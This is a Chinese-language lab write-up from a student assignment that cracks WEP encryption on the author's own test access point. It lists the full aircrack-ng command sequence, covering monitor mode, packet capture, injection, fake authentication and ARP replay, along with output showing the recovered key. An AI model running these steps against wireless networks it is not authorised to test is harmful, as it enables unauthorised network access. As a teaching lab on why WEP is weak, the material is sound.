內容為作者在學期間。某一次作業內容。
這邊僅作為實驗分享,不可以拿去進行任何真實攻擊。
如發生任何法律與金錢層面的問題,後果將由執行者全數承擔。
1.搜尋合適的WEP破解軟體,安裝並學習如何操作。
(建議軟體:aircrack-ng http://www.aircrack-ng.org/doku.php)
2. 可透過iwlist或kismet得知AP 的Channel及MAC address。
3. 需有一台採用WEP加密的AP,一台Station破解。
-WEP加密的AP採用:
TOTO-LINK N200RE(支援WEP、WPA、WPA2)
-Station
採用:Ubuntu 14.04
4.建立的AP 必須可以連至外部網路(因為不是合法使用者,
所以需要讓網路環境有其他成員可以跟這個AP溝通,
才能擷取到ARP封包)。
安裝aircrack-ng服務
#sudo apt-get install aircrack-ng
先看一下網卡狀況
#sudo iwconfig
先停用網卡wlan1的moniter模式
#sudo airmon-ng stop wlan1
看一下停用後的狀態
#sudo iwconfig
然後開啟網卡wlan1的moniter模式
#sudo airmon-ng start wlan1
啟用wlan後,查看ifconfig,會多一個mon0
#ifconfig
將mon0指定到channel 8當中 (8 代表 channel 8)
#sudo airmon-ng start mon0 8
找尋目前位置的所有AP站台,可以找到這次無線AP目標(ccu_test)
#sudo airodump-ng mon0
鎖定目標為目前的AP(ccu_test),
MAC位址為(B8:55:10:2E:7E:D8),圖中也顯示其頻道為ch 8
開始針對剛剛找到的ccu_test進行注入(injection) ,
也是要看你的網卡能不能成功對這個AP進行注入(injection)的行為。
如果最下面是 0%,可能是你距離AP太遠,沒有把法順利的進行injection。
如果最下面是100%,僅是表示有相當高的機會進行injeciton。
實驗數據會根據你的距離遠近而改變。
B8:55:10:2E:7E:D8 為 無線AP的Mac address位置。
#sudo aireplay-ng -9 –e ccu_test –a B8:55:10:2E:7E:D8 mon0
開啟封包蒐集,捕捉生成的IV值
#sudo airodump-ng –c 8 --bssid B8:55:10:2E:7E:D8 –w output mon0
channel 指定 8 、 BSSID MAC位址(AP的位址) B8:55:10:2E:7E:D8
將蒐集到的封包資訊全部匯入output檔當中
一開始都是空白的,當開始進行aireplay時就會有資訊出現。
檢查現在mon狀況
#sudo tcpdump -n -e –s0 –vvv –I mon
如果做LAB環境無線AP太多,可以運用 grep 指令去篩選。
可以看到mon接收到的封包
BSSID: B8:55:10:2E:7E:D8 (無線AP)
DA: FF:FF:FF:FF:FF:FF (正在廣撥)
SA: B8:55:10:2E:7E:D8 (無線AP)
製作一個Fack authentication(假的認證&接入點),
讓使用者連接後會至此驗證。
#aireplay-ng -1 0 –e ccu_test –a B8:55:10:2E:7E:D8 –h 9C-D6-43-00-F5-0A mon0
這邊開始偵聽ARP的請求,然後重新注入回他們的網路模式,
偵聽是因為AP通常會轉播他們新生成的IV值,所以這是我們大量獲得IV值的管道。
#sudo aireplay-ng -3 –b B8:55:10:2E:7E:D8 -h 9C-D6-43-00-F5-0A mon0
無線AP的MAC:B8:55:10:2E:7E:D8
Station的MAC: 9C-D6-43-00-F5-0A
這邊在不要中斷他,讓他持續接收資訊。
如果取到的got ARP值一值是0
請將station斷開ccu_test再重新連接,數據即會出現。
我們同時可以看到另一邊在蒐集封包(IV數值)的terminal,數值開始有反應。
開始針對先前蒐集到的封包資訊(IV值)做WEP的密鑰的破解
#sudo aircrack-ng –b B8:55:10:2E:7E:D8 output-*.cap
B8:55:10:2E:7E:D8 為無線AP的MAC
output-*.cap 為蒐集到封包資訊檔案,因為有數個,所以以*萬用字元表示。
這是運行時IV值取得到3523 還無法破解出WEP密碼
所以下方顯示【Failed. Next try with 5000 IVs.】
IV值取得到5097仍無法,將繼續向下
【Failed. Next try with 10000 IVs.】
IV值取得到10182仍無法,所以繼續向下
【Failed. Next try with 15000 IVs.】
在IV值取到19550時,破解出無線AP的WEP密碼
【KEY FOUND ! …..(ASCII:ccuap)】
可以得知這台無線AP密碼為ccuap
到這邊,WEP的無線加密就破解完成了。
破解時間其實很快,這也是大家現在不用WEP加密的原因之一。
<本篇完>